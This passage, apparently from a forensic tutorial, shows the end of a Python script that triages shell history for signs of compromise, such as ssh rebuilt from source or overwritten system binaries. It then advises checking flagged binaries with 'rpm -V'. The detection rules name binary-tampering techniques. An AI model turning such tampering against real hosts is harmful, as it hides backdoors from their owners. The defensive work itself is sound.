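                        findings.append((no, "ssh-rebuilt-from-source", cmd))
    return findings


if __name__ == "__main__":
    for no, rule, cmd in triage(SAMPLE_HISTORY):
        print(f"{no:>5}  {rule:<26} {cmd}")
```

A hit on `system-binary-overwritten` is a cue to verify the binary against the package database (for example `rpm -V` on the RPM-based host shown here), since the history alone does not prove what was installed.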